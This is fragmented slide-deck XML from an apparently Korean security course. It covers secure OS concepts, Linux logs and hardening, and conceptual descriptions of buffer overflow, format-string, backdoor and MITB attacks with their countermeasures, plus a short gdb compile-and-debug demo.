          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3982452" y="3375774"/>
            <a:ext cx="308008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손목시계형 몰래카메라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를 영내에 반입하여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국방망 육군홈페이지 로그인 화면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 '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육군 보안수칙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등을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촬영해 텔레그램으로 전송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E229419-90CC-47C6-B1BB-842DE9C1E0B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="553452" y="5735052"/>
            <a:ext cx="1108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C2C5627-4A7E-4AB7-9FE9-6DE0A84CF12B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1888957" y="5604867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46969F-FEE4-431F-9185-201D68DA6DC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1692441" y="5139656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2BC672-45CD-492D-B030-7FBED499238D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="601578" y="5955302"/>
            <a:ext cx="105075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원격으로 노트북을 조작할 수 있는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USB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형태의 해킹장비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(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포이즌 탭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)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부품까지 구매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6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4451A1-5189-4251-8AB2-7F66D3AC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14" y="116087"/>
            <a:ext cx="5304772" cy="28085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D53231-8117-47DA-A9AC-43AE3F1A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182" y="573688"/>
            <a:ext cx="1857375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32359-EB69-4A6D-BBDC-4833AF3359E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8333870" y="97474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TACS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E9963-FDD7-4597-BBA2-CAA8CE3BE533}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7407437" y="188495"/>
            <a:ext cx="26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??</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>usb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>안잡고 뭐했어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AF2A4-7A1F-46BB-A356-601EDDE27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890" y="3019047"/>
            <a:ext cx="8341900" cy="38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1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5C13004-CDFD-4D1D-8A98-61766F3F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216819"/>
            <a:ext cx="11649075" cy="2638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D2F21D-5E5E-4030-B557-8C43E180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" y="3206917"/>
            <a:ext cx="11811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65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3"/>
            <a:ext cx="8291264" cy="47089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운영체제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(Secure Operating System)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개념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보안 운영체제는 기존의 운영체제에 내재된 보안상의 결함으로 인한 각종 침해로부터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시스템을 보호하기 위하여 기존의 운영체제 내에 보안 기능을 통합시킨 보안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securitykernel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추가적으로 이식한 운영체제이다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(kernel)6)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설계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(kernel)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최하위 수준의 기능을 수행하는 운영체제의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표준적인 운영체제 설계에서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메모리 관리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(memory management),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동기화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(synchronization),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프로세스간 통신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(IPC,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interprocess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communication),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메시지전달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(message passing)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인터럽트 처리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(interrupt handling)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등과 같은 기능을 구현한다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(security kernel)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운영체제의보안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메커니즘을 시행하는 책임을 진다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하드웨어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및 컴퓨팅 시스템의 기타 부분 간의 보안 인터페이스를 제공한다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일반적으로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보안커널은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운영체제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커널내부에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포함된다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6509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3"/>
            <a:ext cx="8291264" cy="544764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운영체제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(Secure Operating System)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참조 모니터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(Reference Monitor)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참조 모니터란 사용자가 특정 객체에 액세스할 권리가 있는지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 해당 객체에 특정 행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위를 할 수 있는지를 검사하는 기능으로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운영체제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(Secure OS)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프로세스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와파일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객체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정보 흐름을 감시하는 보안모듈이다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보안커널의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가장 중요한 부분으로 객체에 대한 접근 통제 기능을 수행하고 감사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식별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인증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매개변수 설정 등과 같은 다른 보안 메커니즘과 데이터를 교환하면서 상호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작용을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주체와 객체 사이에서 비 인가된 접속이나 불법적인 자료 변조를 막기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위하여참조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모니터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로부터 주체의 접근 권한을 확인하기 위한 추상적인 장치이다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참조 모니터는 다음과 같은 특성을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지녀야한다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① 참조 모니터에 대한 부정행위를 방지할 수 있어야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 참조 모니터는 항상 호출되어야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 참조 모니터는 분석과 시험이 용이하도록 충분히 작아야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8192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2"/>
            <a:ext cx="8291264" cy="59400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보안 운영체제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(Secure Operating System)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신뢰 컴퓨팅 베이스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(TCB, Trusted Computing Base)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TCB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보안정책을 준수하는 데 필요한 보안 운영체제의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TCB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보안정책의 시행을 책임지는 하드웨어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펌웨어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소프트웨어 및 이들의 조합을 포함하는 정보시스템내의 모든 보호 메커니즘을 의미한다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체제별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특징과 주요 기능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유닉스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(Unix)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모태가 되는 유닉스는 다중 사용자와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멀티태스킹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기능을 효과적으로 수행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할 수 있는 운영체제를 만들기 위한 프로젝트에 참여한 미국 벨 연구소의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톰슨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KenTompson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의해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1969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년에 개발되었다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어셈블리 언어로 작성되었던 유닉스는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데니스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(Dennis Ritchie)7)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개발한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언어로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다시 쓰이게 되었고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언어의 특징은 어셈블리 언어처럼 하드웨어를 직접 통제할 수 있을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뿐만 아니라 특정한 하드웨어에 관계없이 프로그램을 작성할 수 있는 상반된 두 가지 성질을 모두 가지고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언어로 작성된 소스코드는 필요할 때에 이식될 하드웨어 환경에 맞게 다시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컴파일하는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과정을 통해서 다른 기종에서도 사용될 수 있게 되었다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954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3"/>
            <a:ext cx="8291264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기억 장치 관리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개념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주기억장치의 구성과 관리는 운영체제에 가장 중요한 영향을 미친다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컴퓨터는 계층적인 기억 장치를 가진다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크게 주기억장치와 보조기억장치로 나눌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프로그램은 주기억장치에 탑재되어야만 실행이 가능하다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CPU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주기억장치의 프로그램을 가져와서 실행하기 때문이다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3" y="3083482"/>
            <a:ext cx="5857875" cy="377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68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2"/>
            <a:ext cx="8291264" cy="39703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기억 장치 관리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할당 기법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메모리 할당 기법은 기억장소에 프로그램이나 데이터가 들어올 경우 기억장소의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위치를결정하는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① 최적 적합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(Best Fit)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입력된 프로그램을 수용할 수 있는 공간 중 가장 작은 공간을 할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당함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 최초 적합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(First Fit)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입력된 프로그램을 수용할 수 있는 공간 중 가장 먼저 발견된 공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간을 할당함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 최악 적합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(Worst Fit) :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입력된 프로그램을 수용할 수 있는 공간 중 가장 큰 공간을 할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당함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702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3"/>
            <a:ext cx="8291264" cy="47089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기억 장치 관리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가상기억장치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(Virtual Memory)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가상기억장치는 시스템에 설치된 물리적 기억장치의 효율적 사용을 위해 사용자에게서 물리적 기억장치를 숨기고 논리적으로 확장된 기억장치를 제공하는 기법으로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물리적 기억장치와 논리적 기억장치 사이의 대응관계를 관리 및 유지하는 시스템 구조와 운영체제의 협력관계가 수행되어야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메모리 구조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어떤 프로그램을 동작시키면 메모리에 프로그램이 동작하기 위한 가상의 메모리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공간이생성된다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그리고 그 메모리 공간은 다시 목적에 따라 상위 메모리와 하위 메모리로 나뉜다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이때 상위 메모리에는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(Stack)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이라는 메모리 공간이 형성되고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하위 메모리에는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힙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(Heap)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생성된다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44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91544" y="908721"/>
            <a:ext cx="8291264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  구조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fontAlgn="base">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicParenR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하드웨어 특성으로부터 프로그램들을 격리시키고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하드웨어와 직접적으로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상호작동함으로써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프로그램들에게 일관된 서비스를 제공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 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shell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이나 유틸리티 또는 응용 프로그램들은 정의된 시스템 호출을 통해서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통신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유닉스 계열의 시스템이 부팅될 때 가장 먼저 읽혀지는 운영체제의 핵심 부분으로 주기억장치에 상주하게 되며 프로세스 스케줄링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기억 장치 관리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시스템 관리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운영체제의 고유 기능을 제공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         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3598164"/>
            <a:ext cx="6675592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82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2"/>
            <a:ext cx="8291264" cy="24929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메모리 구조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(Stack)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영역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영역은 프로그램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로직이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동작하기 위한 인자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(Argument)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프로세스 상태를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저장하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데 사용됨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힙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(Heap)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영역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힙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영역은 프로그램이 실행될 때까지 알 수 없는 가변적인 양의 데이터를 저장하기 위해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프로그램의 프로세스가 사용할 수 있도록 미리 예약되어 있는 메인 메모리의 영역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3" y="3325651"/>
            <a:ext cx="60483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13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계정과 패스워드 보호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시스템을 여러 사용자가 사용하는 멀티유저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(Multi-User)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시스템인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유</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just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닉스는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각각의 사용자만이 접근 가능한 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디렉토리들이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이런 일련의 규정들을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적용시킬 수 있는 것이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퍼미션이고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퍼미션에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의해 사용자들은 자신의 영역을 갖게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계정에 대한 정보를 가지고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사용자들의 고유성을 나타내는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uid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부터 어느 그룹에 속해있는지 등 정보가 들어있다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4365104"/>
            <a:ext cx="542925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30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21236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/shadow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오래된 유닉스 시스템에는 존재하지 않았다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도난으로인한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침해사고가 잦아지자 패스워드의 암호화된 부분을 따로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파일로 옮긴 것이다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3717033"/>
            <a:ext cx="5546551" cy="29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93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/shadow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오래된 유닉스 시스템에는 존재하지 않았다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파일의 도난으로 인한 침해사고가 잦아지자 패스워드의 암호화된 부분을 따로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파일로 옮긴 것이다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파일에는 여러 가지 정보들이 있지만 가장 중요한 것은 암호화된 패스워드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공격자들은 이 암호화된 패스워드를 획득하기를 원한다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암호화는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DES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암호화 방식을 사용하는데 시간이 다소 걸릴 뿐 복호화가 가능하기 때문이다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4437113"/>
            <a:ext cx="6768752" cy="24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52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48320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 생성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 생성은 간단하게 다음과 같이 생성할 수 있다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아무런 옵션 없이 사용자를 생성하였을 경우 기본 옵션이 적용된다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옵션 내용은</a:t>
            </a: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useradd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-D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명령을 이용하여 확인할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수정할 수 있는 내용은 그룹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홈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만료일 등이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생성 예를 들면 다음과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977732"/>
            <a:ext cx="6264696" cy="16754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68" y="5842374"/>
            <a:ext cx="8291264" cy="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2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8472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 생성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정상적으로 생성되었는지 확인하는 방법은 다음과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08" y="3212976"/>
            <a:ext cx="753156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0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21236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useradd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명령에서 사용할 수 있는 옵션은 다음 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2472349"/>
            <a:ext cx="7007544" cy="43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5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21236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useradd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명령에서 사용할 수 있는 옵션은 다음 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78" y="2938044"/>
            <a:ext cx="8255321" cy="30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49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91544" y="980729"/>
            <a:ext cx="8291264" cy="52629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침해사고 원인분석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디지털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포렌식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등 정보시스템에서 로그는 가장 중요한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네트워크를 통해 서버에 접속하게 되는 순간부터 접속을 끊는 순간까지의 모든 행동들이 로그 파일이나 로그 서버에 저장되게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파일의 종류 및 특성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시스템에서는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기본 로그 파일들이 위치하게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리눅스에서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로깅은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심지어는 프로토콜 수준에서도 일어난다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대부분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서비스들은 로그 정보들을 로그 파일들과 표준 출력 장치에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lastlog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lastlog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사용자의 최근 로그인 시간을 사용자 이름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터미널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마지막 로그인 시간으로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/log/las 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 저장되고 바이너리 형태이다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텍스트 편집기로는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볼 수가 없고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lastlog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명령을 통해서만 확인이 가능하다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49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52629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wtmp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로그는 파일이 생성되는 순간부터 사용자의 로그인과 로그아웃 한 정보들을 보여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준다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사용자들의 접속 기록에 대해 많은 정보를 가지고 있기 때문에 공격자들이 가장 먼저 지우고 나가려 하는 파일이다 보니 피해 시스템 분석에 있어서 매우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중요한역할을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btmp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btmp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실패될 경우 이 파일에 저장되게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일반적으로 이 파일은 생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성되지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않으며 직접 생성해주어야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btmp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빈 파일 하나만 생성해주면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④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utmp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유닉스 시스템의 가장 기본적인 로그로 로그인 계정 이름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한 환경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initab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id),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그인한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디바이스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(console,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tty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셸의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프로세스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한 계정의 형식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그오프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여부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시간에 대한 저장 구조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(structure)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확인할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26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HY견고딕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[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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확인 학습</a:t>
            </a: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]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A6FC0BB-ADBE-4EAC-9A67-99601E8237EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1957682" y="1270384"/>
            <a:ext cx="8280009" cy="436123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Q.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커널에 대한 설명으로 옳지 않은 것은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?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① </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" kern="0" spc="-6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하드웨어 특성으로부터 프로그램을 격리시키고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" kern="0" spc="-6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-6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하드웨어와 직접적으로 상호작동한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" kern="0" spc="-6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② 커널의 기본 개념은 프로세스와 파일관리이다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③ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" kern="0" spc="-2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shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" kern="0" spc="-2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이나 유틸리티 또는 응용 프로그램은 시스템 호출을 통해서 커털과 통신한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1800" kern="0" spc="-2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229870" marR="0" indent="-229870" algn="just" fontAlgn="base" latinLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="2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④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UNIX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계열의 시스템이 부팅될 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EO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가장 먼저 읽혀지는 운영체제의 핵심 부분으로 보조기억장치에 상주한다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AD33B73-1507-4052-B65F-64FD38CB9F9E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1350202" y="4689231"/>
            <a:ext cx="468923" cy="250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38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60016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⑤ messages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파일 중 가장 중요한 부분으로써 로그인 기록부터 디바이스 정보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설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 오류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시스템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세션 기록 등 가장 다양한 정보를 가지고 있는 파일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messages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침입자의 공격 형태가 어느 정도 기록되어 지기도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⑥ secure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텔넷이나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 등 인증과정을 거치는 모든 로그를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secure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로그에 저장한다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secure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syslog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데몬에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의해 설정되어 지는데 데몬 설정에 따라서 기록 유무가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바뀔수도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⑦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log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서버를 운영하고 있다면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access_log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error_log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httpd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생기게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⑧ history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history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로그 파일이라기보다는 이전 명령들을 쉽게 찾고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더욱 편하게 사용하기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위해 만들어졌다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파일은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위치하지 않고 사용자의 홈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존재한다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공격자는 침입 후 관리자 권한을 획득하고 이 파일을 지우려고 할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519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20621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⑨ syslog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시스템의 운영과 관련한 전반적인 로그로써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/log/messages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 하드웨어의 구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서비스의 동작과 에러 등 다양한 로그를 남긴다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7" y="2924945"/>
            <a:ext cx="5046935" cy="37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30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42780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보안 설정 방법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sysctl.conf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커널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보안 설정 방법은 다음과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ping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요청을 응답하지 않게 설정한다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브로드캐스트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주소에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ping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못하도록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0).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SYNC Attack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공격을 막기 위해서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백로그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큐의 크기를 늘린다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256).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④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SYNC Flood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공격에 대응하기 위해서 사용한다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0).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ICMP Redirect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위한 공격을 막기 위해서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리다이렉트를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⑥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BED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icmp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무시하게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0).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⑦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방지한다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0).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⑧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IP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스푸핑된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패킷을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로그에 기록한다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0).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⑨ 연결 종료시간을 줄인다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60).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⑩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Keepalive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시간을 줄인다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7200).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⑪ 열 수 있는 로컬 포트를 늘린다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기본값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1024 4996).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598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39087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(BOF, Buffer overflow)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또는 버퍼 오버런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(buffer overrun)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메모리를 다루는 데에 오류가 발생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하여 잘못된 동작을 하는 프로그램 취약점이다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프로세스가 데이터를 버퍼에 저장할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때 프로그래머가 지정한 곳 바깥에 저장하는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보통 데이터를 저장하는 과정에서 그 데이터를 저장할 메모리 위치가 유효한지를 검사하지 않아 발생한다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취약점을 이용하는 기술은 구조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 체제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영역에 따라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다르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개념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데이터의 길이에 대한 불명확한 정의를 악용한 덮어쓰기로 인해 발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 정상적인 경우에는 사용되지 않아야 할 주소 공간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원래는 경계선 관리가 적절하게 수행되어 덮어쓸 수 없는 부분에 해커가 임의의 코드를 덮어쓰는 공격이다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935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공격에 대한 대응책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취약한 함수를 사용하지 않는다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.(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포맷스트링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취약점도 존재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16" y="2616392"/>
            <a:ext cx="6334724" cy="39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52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41549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공격에 대한 대응책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최신의 운영체제를 사용한다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운영체제는 발전하면서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Non-Executable Stack,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(Stack Guard),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쉴드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(Stack Shield)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같이 운영체제 내에서 해커의 공격 코드가 실행되지 않도록 하는 여러 가지 장치가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(Format String)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스트링은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1980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년대에 널리 알려지기 시작한 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달리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1990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년대 말이 되어서야 알려지기 시작한 공격이다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형태에 대한 불명확한 정의로 인해 발생한다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공격처럼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ret(ESP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레지스터가 가리키는 값을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EIP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레지스터에 저장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RETN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이라고도 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변조하여 임의의 코드를 실행시킬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83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포맷스트링의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문자의 종류는 아래와 같다 </a:t>
            </a:r>
          </a:p>
          <a:p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2420888"/>
            <a:ext cx="630912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85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47705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BackDoor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넷버스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Netbus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넷버스는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다른 파일은 감염시키지 않지만 인터넷을 통해 외부인이 자신의 컴퓨터로 들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어와 파일을 삭제하거나 정보를 빼내어 갈 수 있는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프로그램이다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(Back Orifice)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악용의 목적을 위해 만들어진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프로그램으로 원격지 네트워크에서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모르게 정보 수집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명령어 수행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재구성 등 시스템을 통제할 수 있는 클라이언트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어플리케이션이다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스쿨버스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Schoolbus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스쿨버스는 전형적인 트로이목마로써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BackOrifice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넷버스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Netbus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처럼 강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력하면서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사용하기도 쉬운 프로그램이다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트로이 목마처럼 서버 파일과 클라이언트파일로 이루어져 있으며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파일이 상대방 컴퓨터에 설치되어 있어야만 클라이언트 파일을 이용하여 서버 파일이 설치된 컴퓨터를 원격 조정할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60793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39087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BackDoor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RootKit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침입 사실을 숨기거나 재침입하기 위해 설치되고 있는데 가장 잘 알려진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루트킷이라고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하는 트로이 프로그램들의 패키지이다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login, ls,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각종 시스템 파일을 트로이 버전으로 변경시키는데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최근에는커맨드라인에서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환경설정이 가능한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변종들도 많이 소개되고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이러한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루트킷들은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대부분 환경파일을 변경하거나 시스템파일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변경함으로써 공격자가 의도하는 기능을 수행하게끔 하는데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체크섬이나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타임스탬프의 변경도 가능하여 해킹 피해시스템 분석에 있어서 가장 어려운 부분 중의 하나이기도 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884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99934" y="116633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50167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무차별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(Brute Force)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기본적인 공격 방법으로 특정 값을 찾아내기 위해서 모든 조합을 시도하게 되는 공격이다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성공할 때까지 가능한 모든 조합의 경우의 수를 반복적으로 무작위 대입하여 얻은 답으로 공격을 시도하는 침입 방법이다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하트블리드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(Heartbleed)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하트블리드는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월에 발견된 오픈 소스 암호화 라이브러리인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OpenSSL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소프트웨어 버그이다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 세계 웹 사이트 가운데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정도가 사용하는 오픈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SLL(Open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SecureSocket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Layer,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인터넷상에서 문자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문서 등을 송수신할 때 이를 암호화해 주는 기술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발견된치명적인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결함을 말한다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오픈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SSL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통신신호 하트비트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(heartbeat)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발견되어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하트블리드라고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부르는데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‘치명적 심장 출혈’을 의미한다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85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3.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:ea typeface="HY헤드라인M" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>운영체제 이론 및 일반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2"/>
            <a:ext cx="8291264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체제별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특징과 주요 기능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(Windows)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276872"/>
            <a:ext cx="820891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59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해킹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메모리에 상주한 데이터를 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변조하는 해킹 방법이다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해킹 방법은 외부에서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계좌 비밀 번호를 빼내는 방법에 초점을 맞춘 반면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해킹 방법은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비밀문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같은 프로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그램을 설치하고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메모리에 있는 비밀 번호를 빼내는 것 뿐만 아니라 데이터를 조작하여 받는 계좌와 금액까지 변경할 수 있는 해킹 방법이다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피해자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메모리에 상주한 악성코드로 인하여 정상 은행사이트에서 보안카드번호 앞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자리만 입력해도 부당 인출하는 수법이다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933056"/>
            <a:ext cx="739993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3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2677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 MITB(Man-In-The-Browser)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 Injection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MITB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공격은 웹 브라우저 내에 악성 프로그램이 설치된 상태에서 이루어지며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악성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로그램은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메모리에 로딩된 웹 페이지의 내용을 도청하거나 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변조할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통신구간에서 이루어지는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관계가 없으며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SSL/TLS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통신구간이 암호화되어 있더라도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위협이 존재한다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MITB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웹 페이지를 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변조하는 공격을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WebInjection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이라고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00" y="3933057"/>
            <a:ext cx="8389365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75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6625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사회공학기법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(Social Engineering)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정보보호시스템이 잘 갖추어진 사이트를 공격하는 경우나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조직화된 공격 또는 대규모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공격에 있어 사회공학기법은 필수적인 요소이다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사실 사회공학기법은 네트워크 공격에서 일반인이 많이 간과하는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사회공학기법을 이용한 가장 대표적인 공격은 바로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멜리사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바이러스이다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멜리사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바이러스는 방화벽에서 통제하지 않는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이메일을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 전파 매체로 사용하고 있는데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여기서 주목할 것은 감염된 사용자의 메일 주소록을 통해서 전파된다는 점이다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이메일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사용자들간의 신뢰관계를 이용한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488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취약점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63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19536" y="1988841"/>
            <a:ext cx="828092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포맷 스트링과 같이 응용 프로그램 자체에 있는 취약점에 패치를 적용해 이를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응용 프로그램을 통해 시스템에 접근할 수 없도록 응용 프로그램을 통한 운영체제로의 접근 경로를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응용 프로그램의 취약점을 통해 운영체제에 접근할 경우에도 영향력을 최소화하기 위해 응용 프로그램의 프로세스 권한을 낮게 부여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시스템에 존재하는 불필요한 서비스나 악성 프로그램을 확인하기 위해 시스템의 서비스 포트 및 프로세스를 확인하고 무결성 검사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302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버퍼 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1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오버플로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64</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1025" name="_x381657224" descr="EMB000019180743">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5028E5EC-9916-4A9C-93E1-6992318AC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3583652"/>
            <a:ext cx="8280009" cy="29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9DA9E67B-5DD4-486C-B83C-68295BC2C521}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1995079" y="1870337"/>
            <a:ext cx="8280009" cy="140401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길이에 대한 불명확한 정의를 악용한 덮어쓰기로 인해 발생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정상적인 경우 사용되지 않아야 할 주소 공간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덮어쓸 수 없는 부분에 해커가 임의 코드를 덮어쓰는 공격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7865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포맷 스트링</a:t>
              </a:r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65</a:t>
            </a:fld>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2049" name="_x381654904" descr="EMB000019180747">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1547C878-9A99-4E42-8A0E-38B2193A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4070250"/>
            <a:ext cx="8280008" cy="27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2387D083-84D0-4C1B-8712-0AB3C0EB70EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1995079" y="1870336"/>
            <a:ext cx="8280009" cy="202982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사용자로부터 입력을 받아들이거나 결과를 출력하기 위하여 사용하는 형식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사용시의 오류를 이용하여 시스템의 권한을 획득하는 기법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형태와 길이에 대한 불명확한 정의로 인한 문제점 중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‘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데이터에 형태에 대한 불명확한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’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로 인한 것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4705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/Theory/T18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gdb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사용법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183A7CE2-82B6-4927-9876-5F31E4C6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21" y="1856821"/>
            <a:ext cx="5364243" cy="400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AC0586F6-8ECF-4283-A457-03F47D6E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08" y="1856821"/>
            <a:ext cx="5726611" cy="427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97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/Theory/T18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gdb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사용법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0AA773C-14EF-4A37-BBC0-6F886F26F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21" y="1921912"/>
            <a:ext cx="5285154" cy="394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F4890CE-C619-4B37-BCE4-BE23F2D3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27" y="1921912"/>
            <a:ext cx="5517933" cy="411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570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/Theory/T18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gdb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사용법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06A785F-3827-4F15-8E20-629BE1C1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95" y="1690688"/>
            <a:ext cx="5321187" cy="396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B8CDBE8-9EEE-46C3-9DA3-704751E93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19" y="1676655"/>
            <a:ext cx="5769213" cy="43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34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/Theory/T18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gdb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사용법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F7B2141-F865-4F5C-9BD5-31D15E87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6" y="1676655"/>
            <a:ext cx="5515876" cy="411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E2D9F07-11BD-46B8-B88E-7E252BF7A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197" y="1676655"/>
            <a:ext cx="5712734" cy="426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73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3.2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1">
                <a:ea typeface="HY헤드라인M" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>모바일</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:ea typeface="HY헤드라인M" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> 운영체제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3"/>
            <a:ext cx="8291264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3.2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운영체제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(Windows Phone</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" dirty="0"/>
              <a:t>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348880"/>
            <a:ext cx="8136904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87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/Theory/T18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gdb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사용법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98F93CF-81E5-494D-8043-F353848B1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6" y="1666304"/>
            <a:ext cx="5726611" cy="427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4219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&amp;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메모리 구조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38C2BF-E737-4CF1-9271-B620FB4F62E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="838199" y="1921912"/>
            <a:ext cx="5109376" cy="1485791"/>
            <a:chOff x="1196835" y="1885839"/>
            <a:chExt cx="3919993" cy="463445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80E4D0E-B0D4-4619-B7C3-E19AF3D0CE1B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F76FC-A020-45B8-8C27-58D8CFE89112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4634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cd</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="11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/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/ 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mkdir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/ ]# cd test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touch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test_code.c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vi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test_code.c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6C0D68-184D-4013-BBB5-35AD80683AED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6244427" y="1921912"/>
            <a:ext cx="5109376" cy="3144707"/>
            <a:chOff x="1196835" y="1885839"/>
            <a:chExt cx="3919993" cy="61873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2D3B273-6C48-4667-8109-771C5D2CC3B8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8238E7-2E67-427E-8C5D-087E95A28A50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618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gcc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–o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test_code.c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ls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>
                  <a:solidFill>
                    <a:srgbClr val="00B050"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>test_code</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="00B050"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
                <a:t>test_code.c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./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12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123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0x11dc010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gdb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./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…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(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gdb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) set disassembly-flavor intel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(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gdb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)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disas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main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B78BE11-CD1A-4935-943F-FE3C672F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0" b="32424"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6244427" y="5229340"/>
            <a:ext cx="5403978" cy="10672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B010F1-3A2A-4AC1-9E0A-DD6FC1CD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84" y="3338497"/>
            <a:ext cx="3216212" cy="29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0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7FFCE75E-B13B-4D5F-9953-EF24EBE0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63" y="4398042"/>
            <a:ext cx="3407245" cy="21154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&amp;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메모리 구조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2E4275-ED97-4E73-8D3F-3A6E04DC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687" y="1838265"/>
            <a:ext cx="391477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BBBF2EF-017B-4F30-B3BF-CC90D53C5E31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2826386" y="3788318"/>
            <a:ext cx="156341" cy="596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5CED58A-1EC0-436F-9D11-37DDFA71CE16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="12550818">
            <a:off x="4676782" y="2616803"/>
            <a:ext cx="196666" cy="2060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6E4B1-61FA-431E-AD92-BC4F511F96B2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1373785" y="3878537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gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> compile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978D9-A765-43CD-9E1E-5975625C5A45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9536329" y="5603705"/>
            <a:ext cx="7354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b[20]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B40FA0-7C7E-403F-BBB6-EC1D45CC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948" y="1780907"/>
